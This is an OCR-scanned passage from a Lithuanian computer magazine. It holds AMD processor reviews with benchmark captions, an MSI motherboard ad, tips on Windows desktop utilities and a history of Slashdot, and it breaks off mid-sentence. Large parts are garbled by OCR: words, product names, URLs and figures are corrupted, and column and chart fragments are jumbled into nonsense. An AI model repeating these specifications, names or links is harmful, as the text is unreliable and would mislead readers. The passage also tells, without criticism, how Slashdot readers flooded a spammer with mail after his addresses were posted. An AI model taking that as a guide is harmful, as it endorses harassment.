2000 + modelis yra išbrokuota proce 
soriaus AMD Athlon 64 3200+ versija, 
kunoje dėl kažkokių priežasčių pilnai 
nesuveikė 1 Mb kešo. Tą patį mos 
galėjome pastebėti ir su AMD Duron 
šeimos procesoriais. Dar džiugina, 
kad AMD inžinieriai nepakeitė kitų 
procesoriaus parametrų, todėl visu 
kitu 3000+ Upo Modelis niekuo 
nesiskinia nuo 3200+ modelio. Jeigu 
ne sumažinta kešo, kuris vis dėlto 
tun įtakos našumui, apimtis, aptari 
amas procesorius galėtų tapti puikiu 
pirkiniu, Kadangi šis „akmenukas“ 
yra pats jauniausias Athlon 64 serijos 
modelis, jis turi didelį spartinimo 
potencialą. Kartu šu procesoriumi 
pateikiami ir visi šiuolaikinio gyvenimo 
džiaugsmai -— 64 bitų architektūra bei 
Cool'n'Ouiet galimybė. 

Nepaisant visų šio procesoriaus 
privalumų, || sunku pavadinti skirtu 
žaidimams. Taigi FPS vaikymosi fana- 
tams rekomenduojame ieškoti kažko 
galingesnio. 


L2 kešas, Kb: 51 
Technologija, mkm: 0,09 
Branduolys; Venice 


Magistralės dažnis: 2001 
Lizdas; 939 Socket 

Tai pats galingiausias procosonus 
15 teste pristatytų vieno branduolio 
„akmenukų“. Spręsk pats: jis gali 
pasigirti aukštu kristalo darbo dažniu 
tr gera antro lygio kėšo apimtimi, Tuo 
pačiu jame sukištos visos šiandien 
prieinamos AMO technologijos — nuo 
procesoriaus perkaitimo išgelbės 
Cool'n'Oujet, o NX bitas bus pulkus 
pagalbininkas tavo antivirusu, Be 
to, atkreipk dėmesį | šio Įrenginio 
spartinimo potencialą. Žinoma, tau gali 
pakkiūt procesonus, kurio daug nepa 
spartinsi čia jau laimės dalykas. 
Tačiau mūsų bandytas egzempliorius 
parodė 26 procentų našumo prieaugį, 
todėl jį galima apibūdinti Uk gerai, 
Ypatingu privalumu galima laikyti ir 
šio procesoriaus kainą — šiandien jis 
yra puikus pasirinkimas vidutinės kainų 
kategorijos kompiuteriui, 

Būtent todėl, kad nebuvo pastebėta 
ypatingų trūkumų, 0 įrenginys tes- 
tuose pasirodė tiesiog puikiai, Už 
optimalų kokybės Ir kainos santykį 
mes jam įteikiame „Geriausio pirkinio“ 
apdąvanojimą. 


“M 4 t + 44 
eik jąažt 3H 
2 kešas, Kl 51 
HNOPI/ r | MM 
ę ogija 
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Ve 
Magistralės dazZnis: UM 
129 € 
( 19 Socke 


Šis procesonaus modelis yra jau 
niausias iš įrenginių su dviem bran 
duoliais serijos, tačiau tai jam 
netrukdo parodyti fenomenalaus 
našumo. AMD procesoriuose SU 
dviem branduoliais naudojami bendri 
atminties valdikliai ir Hyper Trans 
port magistralės, todėl panašu 
į tai, kad abu branduoliai Juos 
dalina tarpusavyje. Galimybė tokius 
procesorius įdiegti į bet kokią 
AMD Athlon 64 FX pupažistančią 
motininė plokštę ypatingas 
privalumas, Tiesa, prieš tai gali 
tekti atnaujinti motininės plokštės 
BIOS'ą. Šį įrenginį galima paspartinti 
kur kas geriau, nei AMD Athlon 64 
X2 4200+. Be to, čia rasi visus 
reikalingus šiuolaikinio gyvenimo 
džiaugsmus — ir 64 bitų programų 
galimybe, ir Cool'n'Oulet, 1 NX bitą. 
Tuo pačiu šis procesorius išskiria 
tikrai nedaug šilumos, kas patiks 
visiems. 

Šiam „akmenukui“ nėra ko prikišti — jį 
galima paspartinti geriau, Nei VyneSNiuS JO 
brolius, 0 jo kaina ne tokia didelė, Kokia 
galėtų būti, Taigi, Mūsų Nuomone, Nera 
priežasčių, dei kunų Mes negaletu Te jam 
už pačius geriausius rendtatus įteikti prizo 
„Redakcija renkasi“. 


AMD Athlon 64 420014 
Veikimo dažnis, GHz: 2,2 
2 kešas, Kb: 2x512 
Technologija, mkm: 0,09 
Branduolys: Manchester 
(2 x Venice) 
Magistralės dažnis: 2000 
Lizdas: 939 Socket 


sio brolio AMD 


41200+ skiriasi ne 


Nuo savo ank 


Athlon 64 X2 


tik dažniu, kuris čia yra 0,2 GHZ 
didesnis. Be abejo, toks dažnio 
prieaugis jam teižia puikiai susi doro 
bi bok su standartinėmis užduotimis, 
tiek ir su daugiaužduotiškumu 
Įsigijęs tokį „akmenuką“, nepamiršk 
atnaujinti savo BIOS arba 15 an 
ksto įsigyti motininę plokštę, kuri 
gebėtų įdarbinti AMD procesorių 
su dviem branduoliais. Priešingu 
atvėju procesorius veiks lik puse 
savo įspūdingos galios. Be to, pats 
supranti, kad toks įrenginys pilnai 
elipuotas visais reikalingais dalykais 
nuo Cool'n'Oujet iki NX bito, todei 
čia tu nenusivilsi. Tokį procesorių 
drąsiai galima vadinti Hi--End'u, 
juk jo kaina iš tiesų pateisina Šį 
pavadinimą. Už tokius pinigus 
galima Įsigyti biudžetinį sisteminį 
bloką. Tačiau tikėtina, kad kam nors 
tai bus Įkandama kaina, kadangi per 
pusę metų procesoriai su X2 ženklu 
spėjo solidžiai atpigti - maždaug 
3534. Taigi pasitempus jį būtų 
galima įsigyti Ir dabar. 
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[Išvados] 
Visi apžvalgoje pateikti procesoriai turi savo silpnybių. Vienų aukšta kaina, kitų žemas našumas. Tačiau įteikdami ap- 
dovanojimus mes stengėmės būti objektyvūs. Pigaus procesoriaus namų sistemai ieškantiems piliečiams siūlome savo 


dėmesį atkreipti į AMD Athlon 64 3000+ arba AMD Sempron 3300+ tipo variantus. Mašinai, kurią galima būtų priskirti 
kategorijai „Ir pažaisti, ir padirbėti“, rekomenduojame „Geriausio pirkinio“ nominacijos laimėtoją AMD Athlon 64 3500+. 0 
norintiesiems turėti galingą agregatą ir tuo pačiu sutaupyti puikiai tiks AMD Athlon 64 X2 3800+, kurį mes apdovanojome 
prizu „Redakcija renkasi“. 


[3D Mark 05 CPU Test| i 
Čia buvo paleistas procesoriaus testas, iš kurio galima matyti, kad M 

yderiai vienareikšmiškai yra procesoriai su dviem branduoliais. MD Athion ( 
kuo daugiau, tuo geriau) MO AV 


š 1 


1 
- 


[Super PI, c] D 
Mėgstamiausia spartintojų programa, leidžianti apskaičiuoti skaičių MD A 
Pi, daro savo. Vaizdas menkai pasikeitė — lyderiai ir autsaideriai 

šliko tie patys. M 
kuo mažiau, tuo geriau) AM 


i 
“ 


[i 


[Lame Audio, c] 

Keista, tačiau šiame teste tiek AMD Sempron 3000+, tiek AMD 
Athlon 64 3000 + rezultatai praktiškai lygūs! M 
kuo mažiau, tuo geriau) 


[HL2, 640x480] " 
Net ir žaidimuose visas prizines vietas gavo Athlon 64 „akmenukai“. M 
kuo daugiau, tuo geriau) M 643 


| 
| 
| 


i. 
n 2 


[DivX 5.11, c] 
Nesvarbu koks testas, vaizdas nesikeičia. Jeigu vienu metu , . 
paleistum keletą testų, tai skirtumas tarp procesorių su dviem AMD Athlon 64 3500+ 
branduoliais ir visų likusiųjų tik padidėja. AE an PSS 
kuo mažiau, tuo geriau) 
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MSI AMD: 


www.msi.com.tw 


i 
V 


Palaiko AM2 lizdą ir DDRII atmintį 


Jau tapo legenda... 


MS! 


|| 2003 2006 


Neilas Armstrongas MSI pirmieji sukūrė pagrindines MSI pirmieji sukūrė MSI pirmieji sukūrė 
1* žigsnis mėnulyje plokštes A tipo lizdui AMD64 pagrindines plokštes pagrindines plokštes AM2 
tipo lizdui, 64-bitų, DDRI! 


KSN Platinum KSN SU Platinum K9N Diamond 


He 2. 
S 


- KZ: 


AMD 


J 
KP 


S < 


L 
7 
> 
„T 
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- "į * 
Gyvenimo grožybės 
Tobuliname langinių ergonomiką 
Keisti vaikinai tie automobilininkai. Jie pasiruošę išleisti 
paskutinį centą pačioms įvairiausioms detalėms, kurios 
prie jų eržilo galios žada pridėti porą arkliukų. Pasitaiko ir 
estetu, kurie iš tiesų vertina automobilio išorinį vaizdą ir 
salono patogumą. O kuo tu už juos prastesnis? Nuostabu, 
tačiau tą patį galima pritaikyti ir langinėms. Jas taip pat 
galima padaryti patogesnes ir efektyvesnes, pakanka įdiegti 
porą papildomų dalykėlių. Taigi sveikas atvykęs į „Hakerio“ 


tiuningo ateljė! 


turtu viena žalinga iprotį: laikau atidaryta 
krūvą nereikalingų langų. Mano užduočių 


juostoje Uaskhar! tikras chaosas: aks bado 


dešimčių pačių įvairiausių langų pavadini 


nar, todel Lap retai * reikalinga 


praktiškai nerealu, Užkniso! Laime, aš jau 
radau ši0s problemos sprendimą jU0 
tapo programa miniMIZĖ (htto: /aguariė 

5 nuostabus įrankis perima bet koki 


mMinimzuojamą langa 1 ant eki 


S dUgo 


naža JO vaizdą yeviow), šalia 0 taip 


at atvarduogama Ir programos ikona, Tu 


1“ neistvaizduoi, kaip tai vadė atrodo 


įsivaizduoti nereikia vilgtelėk 


auka), Norint sugražinti bet kokias 


mas langą, pakanka paspausti ant 


> pateikto šios programos 


do. Prireikus šia darmią vaizdų oe galima 


sdeboti prie amėe planė ar vesti 


ekrana į šio Klaviso paspaudimo 
turi daugybę vaiiausių 


nustatymų. Tai ret „kad tu gales! nesu 


kiai pakeisti ekranė pateikiamų vaid 


skakdruma, jų dydį 1r Lt. Kitaip tanant, labai 


mgalvotas dalykas 


Kiekvienas žino, kad klavišų All 


kombinacija leidžia greitai persijungt 
tarp programų. Nuspaudus Ši populiana 
kombinaciją vartotojui pateikiamas 


„kuriame puikuojasi aktyvi 


amų Ikoneėlės bei po jomis patoiki 
am programų langų pavadinimai. Toks 


as puikiai veikia jeigu pas tave 


1 viso labo keletas į 


Vis dėlto 5 


Programa udoja pr“ 


kombinacijas ir išveda panašų Iar 


tačiau be viso kito atvaizduoja neodxdelo 


programos nuotrauką (prov Spaud 
Alt 


vadas. Pa 


0 ten progri 


5 lango 


suprantu, kaip Lai į 


įeigu tu turi atsidaros keleta vi 


pačios programos langu, Beje, tu gali š 


per jma susikor! M taip, kaip tik 


tau nonsi, Tavo paslauį debesis 


Įvainausių nustatymų Ir savybių 


Ar mekada nesusimąstė, kodėl | greito 


palektimo skydelį (ąucklaunėh! galima 
Ikelti Uk programos paleidimo arba 
katalogo atidarymo nuorodas? O kodėl 
pavyzdžiui, čia negalima sukurti nuorodų 


iu Meniu? Tuomet 


"1 sugrupuot programas a] 


s, biuro įrankiai, prog 


"Lt 0 lada pasirinkt 


katogoriją bei pačią progrė 
standartunėse langinese tai neimanoma 
r visa tai dėl „Microsoft“ kūrėjų tir, 


Laimė. šią neteisybė galima iš 


Launch Bar 


su programa Tr 


truetaunehbar.com). Ja Kd 


puoti greito palo 


vIsokKenopDai Ir nea! 


a, taip pal 


audoti S norėč 


paminėt u galimybę, kun k 


| Užduočių sta vaizdžiai Ikelti pk 


įvairiausius dalykus: Ootų prognozę, 


nešiojamojo kompiutė 
medikatonų, komandinė eHutė, greito 


grotuvo valdymo s 1 dar daug ka 


Nugis; index 


Žodžiu, Žvlgtetėk ; nuotraukas 


tau viskas paaiškės 
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Bet kurioje nors kiek pažangesneje 
programavimo aplinkoje vra tokia 
nuostabi funkcija, kaip automatinis 
žodžių papildymas. Programuotojui 
nereikia surnkanėti sudėtingų Iunkeijų 


pavadinimų kūrimo aplinka pal 


pagal pirmas rades bando nustatyt 
funkogos pavadinima ir siūlo Kinkamus 
vanantus. Taip sutaupoma daugybė 
laiko, 0 daugelio funkėijų pavadinimų 
galima paprasčiausiai neatsiminti, 
Programos IntelliCompiete www 
Hashpeak.com/icompi kūrėjams I 
to pasirodė maža. Vaikinai auto 
matinio papildymo funkėlja realizavo 
globaliame lygyje, beje, lai galioja ne 
tik programavme naudojamų Tunkėlju 
pavadinimams, bėt Ir iprastiniams, 
žmogiškiems žodžiams. Si programa 
nepriklauso Nuo jokios konkrečios 
apbkacijos It automatinio papiktymo 
funkcija užtikrina visur, bet kurioje pro 
mojo! Tu tiesiog pradedi rinkti Žodi 


aukiančiame lango tau siūlomi 
Akio užbaigimo vanantai. Dviaubai 
maloniau, kad kūrėjų svetainėje 


prieinami žodynai 


Mes sąmoningai Išvengėme 
Windows sąsajos gražinimo 
klausimo, Nori madingos var 
totojo sąsajos bei daugybės 
Ivairių papildomų galimybių? 
Skaltyk mūsų žumakė publikiotą 


straipsni „Gražiai gyventi 


nouždrausi" 


Linux kūrėjai kovoje už darbastalio 
erdvę pasinaudojo vienu labai pa 
prastu, bel gudrių metodų. Vietoje 
vieno darbastalio j6 pasiūlė naudot 
keletą 1r prireikus tarp ju persjunginėti 
Iš pradžių tai atrodo šiek Lek nepa 
togu, tačiau po kurio laiko, kai galų 
galė pripranti prie šios idėjos, pradedi 
suprasti, kad meko patogesnio nebuvo 


galima sugalvot. Viename darbasta 


Iyje yra paleistos su « 


rbu susijusios 
ICO ir IRC. Tu 


akimirksniu atsikralai pagundos 1610 


programos, kitame 


pokalbių svetainę ir parašyti vieną 
sta (daugink iš dešimties) žinutę, Ir 


tai viso labo venas galimas pritaiky 


Žiut, biure galima lengvai 


mas. Pavy 
persijungineti 15 Ouakė | darbasta 


Studio, Šaunu? 


su paleistų Visi 
Be abejo! 


Beje, vos nepamiršau, Visos ŠIOS 


Yybės prieinamos idiegus programą 


Chimera Virtuai Desktop (www.chime 
ra. huvvutuoai desktiy). 5U ja tu galesi 


Š karto O 54 


varbun! 


vungus darbas! 
alius bei turėsi galimybę persijurgynėi 


tarpo JŲ Menu pelės paspaudimu 
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Igimtu raštingumu pasigirti gali tol 
gražu Ne Visi: pavyzdžiui, aš šiūs savybės 
niekada neturėjau, Taiji noredamas 
patikrinti galimas parašytame teksti 
padarytas klaidas, aš tradiūiškai |) visą 
kopijuoju + Word, patikrinu, ir tik tada 
visa tai pėrkebu ten, kur reikia. Sis 
metodas klaikiai nepatogus, tačiau 
elektyvus, Vienas mano geras bičiulis 
pasijuoke 15 manęs ir tokių ISkrypeliskių 
darbo metodų bei pasiūlė pasinaudo! 
rankių Spal! Checker (www. spell com 
ru). Pasirodo, tai ypač naudingas 


daikčiukas. Iš esmės tai yra nuolatinio 


ortogratjos Ukrinimo sistema, Ji moka 


daugiau 144 23 kalbas, 0 svarbiausia 


yra tai, kad ji nepriklauso nuo jokios 
konkrečios programos. Spal! Checher 
gali veikti visur! Ją paleidus, + nuolai 
tūno atmintyje, iš kur stebi renkamą 
teksta 1! jį Ukrina arba analizuoja 


apsikeitimo buferi ( kur] tekstas pat 


enka nuspaudus Otri+ 0, Jeg žodis 
surinktas neteisingai, tai || Luojau 
pat nurodytoje ekrano vietoje parodė 
Nauda. Programos nustatymuose ši4 
metą galima lengvai pakeisti, Lap pat 
galima pakeisti r laika, kurį klandtos 
pranešimas bus rodomas ekrane, Bi 
to, Klaidingai ivėsto žodžio atsiradimą 


gali lydėti garso signalas 


IMPLANT SOFTWARE FERRUM 


HACK 


SCENA 


UNIXOID 


CODING 


UNITS 


Robas Malda, Slashdot tėvas 


018 


Shlashdot 

Paskutinė technogykų šventovė 

KASDIEN ŠIMTAI TUKSTANČIŲ LANKYTOJŲ 
UŽEINA | ŠIĄ SVETAINĘ NORĖDAMI SUŽINOTI 
PASKUTINES ŠIUOLAIKINIŲ TECHNOLOGIJŲ 
PASAULIO NAUJIENAS, IŠSAKYTI SAVO 
NUOMONĘ APIE STAMBIŲ KORPORACIJŲ 
APLINKOJE VYKSTANČIUS ĮVYKIUS IR „Al- 
RASTI KAŽKĄ NAUJO BEI ĮDOMAUS. ŠIOS 
SVETAINĖS LANKYTOJAI — PAGRINDE 
TECHNO ELITAS, KŪRYBINGAI MĄSTANTYS 
ŽMONĖS, KURIŲ IDĖJOS NUKREIPTOS | 
ATEITĮ. JUOS PRIIMTA VADINTI GYKAIS, O JŲ 
GYVENAMOJI VIETA — SLASHDOT.ORG. 
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1973 

Slashdot įkūrėjas Robas Malda aka Cm- 
drTaco - gimė 1973 metais Mičigano valstijoje, 
Holendo mieste. 


1987 

Tėvai jį išsiuntė mokytis į 
religinės krypties privačią 
mokyklą, kur Robas pirmą 
kartą susidomėjo kompiute- 
riais Ir nemenką savo laiko dalį praleisdavo 
studijuodamas vietinių BBS turinį. 


( 


1992 

Vyresnėse klasėse Ro- 

bas bandė užsidirbti = 
pinigų su TurboPascal 

rašydamas shareware 

programas, jis parašė naudojimui tinkle 
skirtą (on-line) BBS žaidimą ir muzikinių 
kompozicijų kūrimo įrankį. Tai jam neatnešė 
jokio apčiuopiamo pelno, todėl tekdavo 
dirbti prekybos centre ir į lentynas dėlioti 
prekes. Kai Malda įstojo į koledžą, jis, be 
jokios abejonės, pasirinko kompiuterių 
mokslu fakultetą ir pradėjo uoliai mokytis 
bei kaupti žinias. 


1996 

Mokslų metu vaikinas įsitaisė į firmą „Don- 
nelly“, kur dirbo kompiuterių techniku 
ir užsiiminėjo programinės įrangos bei 
geležies įdiegimu. Maždaug tuo metu jis 
susipažįsta su Linux ir iš karto susižavi jos 
galimybėmis automatizuoti krūvą rutiniško 
darbo, kurį tekdavo daryti su Windows. 
Be to, CmdrTaco šiuo metu aktyviai studi- 
Juoja web technologijas, pradedant HTML ir baigiant su duomenų 
bazemis veikiančių web aplikacijų programavimu. Igijęs tam tikrų 
žinių, Robas pradeda uždirbinėti pinigus iš web svetainių, kurias 
Jis kurdavo įvairioms įstaigoms, bankams ir nedidelėms firmoms. 
Tuo pačiu jis pradeda kurti nuosavą svetainę, kuri skirta Linux ir 
technologijoms. Kaip tu jau tikriausiai numanai, šia svetaine taps 
Slashdot. 


1997 

slashdot.org domenas buvo užregistruotas 1997 metų rugsėjį. 
Robas norėjo, kad pavadinimas būtų kiek galima labiau neįprastas, 
todėl iš pradžių domenų registratoriai net 
nenorėjo registruoti ženklų „/.“ garbei 
pavadintos svetainės. Vis dėlto Slashdot 
buvo užregistruotas ir gruodžio 31 jame 
pasirodė pirmoji žinutė, kurios autoriumi, 
be jokios abejonės. buvo CmdrTaco. 
Pranešime buvo pasakojama apie nau- 
jos paslaugos atsiradimą internete 
galimybę užsisakyti nuotrauką, padarytą 
iš Žemės orbitoje skriejančio palydovo. 
Plėtoti svetainę Robui smarkiai padėjo 
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draugas Džefas Beitsas aka Hemos, su kuriuo jie drauge įkūrė 
nuosavą nedidelę kompaniją. 


1998 

Visais šiais metais projektas buvo veržliai tobu- 
linamas: daugėjo straipsnių, žinučių, svetainės 
lankytojų, atsirado naujų autorių. Vienu jų 
tapo žymus amerikiečių žurnalistas ir rašytojas 
Džonas Katzas (Jon Katz), kuris išgarsėjo savo 
straipsniais ir internetiniu žurnalu HotWired bei 
tuo, kad buvo populiarių leidinių Boston Globe ir Washington Post 
redaktorius. 


1999 

1999 metais Katzas galutinai paliko 
HotWired ir tapo nuolatiniu Slashdot 
redaktoriumi bei straipsnių autoriumi. 
Daugelis jo rašomų straipsnių skirti 
gykų subkultūrai ir įvairioms misti- 
fikacijoms. 

1999 metų pabaigoje Robas galų gale 
pabaigia koledžą ir pradeda dirbti prie 
savo kūrinio, juo labiau kad svetainės perspektyvumą galima buvo 
įžiūrėti plika akimi. 


gs 
Nu 


1999 

Šių metų pradžioje internete pirmą kartą 
pasirodė naujas reiškinys, kuris buvo pavadin- 
tas slashdot efektu * (apie jį skaityk žemiau). O 
birželio 29 svetainė buvo parduota kompanijai 
Andover.net — tolimesniam plėtimuisi reikėjo 
stambių investicijų, kurių Robas su savo kom- 
panjonais neturėjo. Taigi sulaukęs 23 metų 
Malda gavo apvalią sumelę ir galimybę tęsti 
savo darbą jau kaip Andover.net darbuotojas. 


Kapitalo injekcijos į Slashdot nebuvo 
bergždžios — svetainėje pasirodė daug naujovių: atsirado 
keletas naujų skyrių, įvedama žymioji metamoderavimo sis- 
tema. Tūkstantmečio pradžioje Slashdot'e pasirodė jubiliejinis 
dešimtūkstantasis straipsnis, o vasarą — milijoninis komentaras. 
Svetainės varikliukas nuolat tobulinamas, įvedama taip vadinama 
„zoologijos sodo“ sistema, leidžianti vartotojus priskirti draugų arba 
priešų grupėms, atsiranda prenumeratos galimybė. 


2001 

2001 metais tuometinė Slashdot savininkė 
VA Linux Systems susidūrė su tam tikrais fin- 
ansiniais sunkumais, kas atsiliepė svetainėje 
pateikiamos reklamos kiekiui (IT kompanijos 
už reklaminių antraščių publikavimą tokioje 
svetainėje, kaip Slashdot, mokėjo stambias su- 
mas). Tuo pat metu buvo pritaikytas originalus 
tais laikais reklamos modelis — užsiregistravę 
vartotojai, sumokėję po 5 dolerius už kiekvieną 
tūkstantį parodytų puslapių, galėjo nematyti 
visos šios reklamos. Pageidaujančiuju kiekis 
buvo skaičiuojamas dešimtimis tūkstančių, 
todėl modelis pasirodė esąs gana sėkmingas. 


19) 
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20) 
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Vis dėlto šiandien tai jau istorija, kadangi šiuo metu S/lashdot'e 
liko labai nedaug reklamos. 


POLITICS 
FOR 


2004 

2004 metų rugpjūčio viduryje bendras 
svetainėje pateiktų komentarų skaičius 
jau viršijo 10 milijonų (straipsnio rašymo 
metu šis skaičius svyruoja maždaug 15 
milijonų ribose). Tais pačiais metais, likus 
dviems mėnesiams iki JAV prezidento 
rinkimų, Slashdot'e pasirodė politikai 
skirtas skyrelis. Jo pavadinimą į lietuvių 
kalbą būtų galima išversti kaip „Poli- 
tika vėploms. Jūsų balsas yra svarbus“ 
(Politics for nerds. Your vote matters.). 
Savaime suprantama, čia bus svarstomos 
ne įprastinės, o pačios skandalingiausios 
politikos naujienos, keliami klausimai, 
kuriuos publikuoti ryžtasi ne kiekviena 
žiniasklaidos priemonė. 


[Kaip suorganizuotas „Slashdot“] Bet kuris Linux sistemos var- 
totojas, savo naršyklėje atsidaręs slashdot.org svetainę, čia gali 
pasijausti Kaip namie — svetainės dizainas akivaizdžiai buvo 
kuriamas pasinaudojant būtent šių operacinių sistemų grafinių 
aplinkų įspūdžiu. Šiaip ar taip, bent jau man susidarė toks 
įspūdis. Slashdot'e dabar yra 13 pagrindinių skyrelių: „Pagrindi- 
nis“, „Apple“, „Klausk Slashdot“, „Knygos“, „Programuotojai“, 
„Žaidimai“, „Aparatūra“, „Interviu“, „IT“, „Linux“, „Politika“, 
Mokslas“ ir YRO. Tačiau tai — tik ledkalnio viršūnė. Apsilankius 
nuorodoje „Topics“, galima pamatyti daugybę poskyrių, kurių 
čia yra per šimtą. 

Viskas prasideda nuo to, kad redaktorius viename iš šių skyrelių 
sukuria naują žinutę (medžiagą paprastai atsiunčia svetainės 
lankytojai) — tai gali būti įdomi naujiena, idėja arba straipsnis, 
ten pat publikuojamos nuorodos į svetaines, kuriose apie tai 
galima sužinoti išsamiau. Po to ši tema aktyviai aptarinėjama, 
o šie aptarimai neretai perauga į audringus ginčus. Kiekviena 
Slashdot publikuojama informacija įdomi ir gili savo turiniu: juk 
ne veltui portalas žymus kaip visos planetos gykų šventovė! 
Apibūdinti Slashdot vienu žodžiu, pasakant, jog tai forumas 
arba naujienų svetainė, nepavyks. Projektas labiausiai primena 
gigantišką web blogą, tačiau pagrindinis jo skirtumas nuo 
pastarųjų — unikali resurso moderavimo sistema. Jos ypatybė 
ta, kad moderatoriumi gali tapti bet kuris žmogus, turintis tam 
tikrą laiką galiojantį svetainėje registruotą vartotoją (reikia, kad 
vartotojas įeitų į 92,596 seniausių sistemos vartotojų skaičių), 
nuolat besilankantis svetainėje ir galintis pasigirti teigiama kar- 
ma (karma — tai savotiškas Slashdot reitingas). Moderuojant 
pranešimai nėra pašalinami, o tiesiog paslepiami iš puslapio, 
kadangi čia veikia dviejų lygių moderavimo mechanizmas. 
Pirmame etape įvertinami svetainės pranešimai. Kuo didesnį 
įvertinimą gauna žinutė, tuo daugiau ji turi tikimybės būti 
parodyta pagrindiniame svetainės puslapyje. Tuo pačiu mod- 
eratoriai turi ribotą balų, kuriuos jie gali išdalinti per tam tikrą 
laiko tarpą, skaičių. 

Antrame etape filtruojamas nekokybiškas moderavimas. Tuomet 
pablogėja „blogų“ moderatorių karma, jie netgi gali netekti 
savo įgaliojimų, kol vėl neigaus teigiamo koeficiento. Karma 
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gerėja nuo teigiamai įvertintų svetainėje pateiktų pranešimų 
ir komentarų. 

Slashdot redaktoriai turi neribotas resurso moderavimo gal- 
imybes, tačiau jie seka tik 396 turinio — visu kitu užsiima pa- 
prasti vartotojai. Tokia automatinio moderavimo politika leidžia 
efektyviai atsijoti neįdomias žinutes ir komentarus, paliekant tik 
iš tiesų gerą ir įdomią medžiagą. Taigi galima sakyti, kad Slash- 
dot — tai automatiškai medžiaga papildoma ir automatiškai 
redaguojama svetainė, kurios darbų automatizavimas pavestas 
bendruomenei. Priešingai nei daugelyje kitų panašių projektų, 
čia šis mechanizmas veikia tiesiog puikiai. 

Kiekvienas Slashdot vartotojas gali kurti savo žurnalą, kuri perskai- 
tyti gali bet kuris vartotojas. Čia galima išreikšti savo santykį su 
kitais vartotojais, priskiriant juos draugų arba priešų kategorijoms. 
Žodžiu, svetainėje sukurtos visos jos lankytojų bendruomenės 
egzistavimo ir vystymosi sąlygos. Geriausias Slashdot apibrėžimas 
būtų ne web blogas, o „online pramoga“. 

Kalbant apie techninę pusę, Slashdot.org veikia iš karto dešimtyje 
serverių. Penki iš jų skirti puslapių užkrovimui, trys — paveikslėliams, 
dar du įdarbinti kaip SOL ir NFS serveriai. Devyni iš dešimties šių 
serverių veikia su Debian Linux sistema. Svetainės varikliukas 
vadinasi Slash (Slashdot-Like Automated Storytelling Homepage). 
Pirmąja jo versiją sukūrė CmdrTaco ir CowboyNeal, antrąją — pro- 
gramuotojai iš OSTG, kai kurie iš jų ir šiuo metu užsiima projekto 
tobulinimu. Slash parašytas su Perl ir yra platinamas pagal GNU 
licenciją. 


[Įdomūs pranešimai] Geriausi Slashdot pranešimai gali 
sukelti didelį susidomėjimą, ir nesvarbu, ar tai naujos NASA 
kosminės programos aptarimas, diskusija apie mažaminkščių 
monopolistišką politiką arba net nostalgiški prisiminimai 
apie senus „Konami“ Kontros tipo žaidimus. Smalsiems, 
šiuolaikinėmis technologijomis ir mūsų gyvenimo naujovėmis 
besidomintiems žmonėms šis resursas tiesiog informa- 
cijos lobynas bei galimybė pačiam pasisakyti. Per svetainės 
egzistavimo laiką buvo daugybė įvairių atvejų ir triukšmingų 
diskusijų. Apie kai kuriuos iš jų aš tau papasakosiu. 

2002 metų pabaigoje „spamo karalius“ Alanas Ralskis spaudai 
davė kelis interviu apie savo verslą, kur pasakė, kad elektroniniu 
paštu siuntinėjamuose reklaminiuose pranešimuose jis nemato 
nieko blogo. Neilgai trukus Slashdot'e pasirodė pranešimas su 
nuorodomis į šį interviu. Be abejo, šio interviu turinys tarp slash- 
dot vartotojų sukėlė pasipiktinimą. Po trumpų svarstymų kažkas 
pasiūlė gana originaliu būdu nubausti Ralskį — užprenumeruoti 
jam visą įmanomą elektroninę ir paprastą reklamą. Forume buvo 
pateiktas elektroninio pašto ir tikrasis (fizinis) spamerio adresas... Ir 
čia viskas prasidėjo. Alanui iš savo pašto dėžutės kasdien tekdavo 
iškuopti po keletą kilogramų pašto, o elektroninio adreso jam iš 
viso teko atsisakyti. 

Spaudoje ne kartą buvo aprašinėjama 2000 metais užvirusi 
Slashdot ir „Microsoft“ priešprieša. Viskas prasidėjo nuo to, kad 
Slashdot'e buvo išpublikuota informacija apie duomenų apsau- 
gos protokolo Kerberos praplėtimus. Kaip žinia, šis protokolas 
iš pradžių buvo kuriamas kaip atviras standartas. „Microsoft“ 
šį standartą panaudojo Windows 2000 sistemoje, kur jį šiek 
tiek pakeitė, dėl ko jis prarado savo „atvirumą“. Slashdot'e 
pasirodžiusiame straipsnyje „Kerberos, PAC ir purvini Microsoft 
triukai“ buvo pateikiamos tų pačių microsoft'ininkų padarytų 
standarto pakeitimų specifikacijos kartu su pastarųjų adresu 
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1mais kaltinimais dėl bandymo taip mMonopolizuoti serverinių 
temų rinką. „Microsoft“ pagrasino teismu, tačiau Slashdot 
stino pasitraukti Ir galiausiai įrodė savo tiesą. Įdomu tai, 


kaip tik po šios informacijos išpublikavimo prieš Slashdot 
) Ivykdyta triuškinanti DDOS ataka 

'ero, originaliausią žinutę Slashdot'e paskelbė pats 
ainės kūrėjas. 2002 metų vasario 14, Svento Valentino 
ą Robas sukūrė žinutę su antrašte „Ketlin Fent, perskaityk 
1nešimą"“. Sioje žinutėje Robas savo mylimajai pasiūlė už 


tekėti. Po 15 minučių šiame pranešime pasirodė pačios 
in komentaras su antrašte „Taip!“, o pranešimo tekste 
parašyta: „Keistuolis. Per tave aš apsiverkiau :). Valio! 


[Populiarumo pasekmės] * Pasakojant apie Slashdot, nega 
nepaminėti su svetainės augimu pastebėto reiškinio. Tai 
vadinamas „slashdot efektas“. Esmė tame, kad Slashdot 
ešimuose dažnai pateikiamos nuorodos į autorinius mažai 
mus resursus, 0 kadangi portalo auditorija milžiniška, toks 

elis lankytojų antplūdis parodytai svetainei gali tapti mirtinu, 

; Iš esmės šis antplūdis tampa DDOS ataka. Svetainės greitai 
ingia ir tampa neprieinamos visam internetui. Anglų kalboje net 
rado veiksmažodis „to be slashdoted“ , kuris sakomas apie dėl 
igaus lankytojų antplūdžio savo darbą nutraukusius web pusla 
Paprastai lankomumo šuoliukas tęsiasi iki 15 valandų, kol 
arštoji naujiena įkurdinama pirmame Slashdot arba kito stambaus 
raujienų resurso puslapyje. Tiesa, visame tame galima įžiūrėti ir 
Iigiamą niuansą: dažnai užslashdotinta svetainė gauna būrį naujų 
olatinių lankytoju. Siandien, kai visur paplitę patys įvairiausi 
gai, „slashdot efektas“ internete yra dažnas reiškinys. 

Mokslininkai, taip 

taines nuo panašaus efekto apsaugančios sistemos. 
tikriausiai būtų įdomu sužinoti, ar hakeriai atakavo Slashdot 


jat Ir sociologai, ji atidžiai tyrinėja, Kurlamos 


pasitaikė šios svetainės nulaužimo atvejų. Taip, buvo, yra ir 
Pirmą kartą Slashdot buvo nulaužtas 1998 metu rugsėjį: 
1užėliai kurį laiką išdykavo su nulaužta sistema, o po kiek 
